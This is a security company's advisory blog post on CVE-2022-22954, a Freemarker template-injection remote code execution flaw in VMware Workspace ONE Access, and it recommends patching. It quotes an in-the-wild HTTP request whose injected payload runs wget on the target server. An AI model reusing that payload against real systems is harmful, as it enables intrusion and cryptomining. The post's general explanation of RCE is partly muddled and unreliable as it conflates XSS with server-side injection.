• Home
  • Services
    • Managed Detection and Response
    • Security Assessment
    • Phishing Assessment
    • Vulnerability Management
    • CISO as a Service
    • Penetration Testing
    • Outside-in-Security
    • Inside-Out-Security
    • Security Audit
    • Static Code Analysis
  • Insights
  • Contact Us
Menu
  • Home
  • Services
    • Managed Detection and Response
    • Security Assessment
    • Phishing Assessment
    • Vulnerability Management
    • CISO as a Service
    • Penetration Testing
    • Outside-in-Security
    • Inside-Out-Security
    • Security Audit
    • Static Code Analysis
  • Insights
  • Contact Us
Phone-alt Linkedin

Common Vulnerabilities and Exposures – CVE-2022-22954 VMware Workspace ONE Access and Identity Manager

CVE-2022-22954 VMware Workspace ONE Access and Identity Manager –  remote code execution vulnerability

VMware Workspace ONE Access and identity Manager has been affected by a remote code execution vulnerability. Remote Code Execution (RCE) vulnerabilities are used by attackers to gain access to a target system from remote locations. This can be done by using an existing injection mechanism within a product, for example PHP or SQL requests that can be found when retrieving data from a server, but instead the attacker can manipulate this by embedding their own code through XSS or SQL injection methods which gets interpreted by the selected language and processed. By processing this code, the attacker can either inject malicious code within the product or retrieve sensitive information.

In VMware’s particular case, attackers are able to inject this code through the use of a server-side template and use it to infect servers for cryptocurrency mining. A server-side template is something that is used when user input is embedded in a template of some form and is processed by the target application. So in this case, a server-side template utility called ‘Freemarker’ can be exploited and used to inject code within this product. An example of it, from Bad Packets, seen below, shows this in detail.

“GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=${\”freemarker.template.utility.Execute\”?new()(\”wget -U \”Hello 1.0\” -qO – (RCE)”)} HTTP/1.1”

As for a resolution to this vulnerability, VMWare states to apply the latest patches. This is a Critical level vulnerability scoring a 10 on the CVSS Score.

Recent blog posts

Common Vulnerabilities and Exposures – October 2022

Read More »

Hacks – October 2022

Read More »

Protecting your data – The CIA Triad – Part One: Confidentiality

Read More »

Need help with this?

Enter your details below and one of our team will get in touch

Other Similar Articles

Hacks – Wiper Malware

Read More »

Common Vulnerabilities and Exposures August 2021

Read More »

Network Firewall

Read More »

Common Vulnerabilities and Exposures – October 2022

Read More »
View all our blog articles
Linkedin
  • Insights
  • Contact Us
Menu
  • Insights
  • Contact Us

Our Office

Level 2, 157 Walker Street, North Sydney, NSW 2060

Call Us

(02) 9136 6066

Email Address

info@brace168.com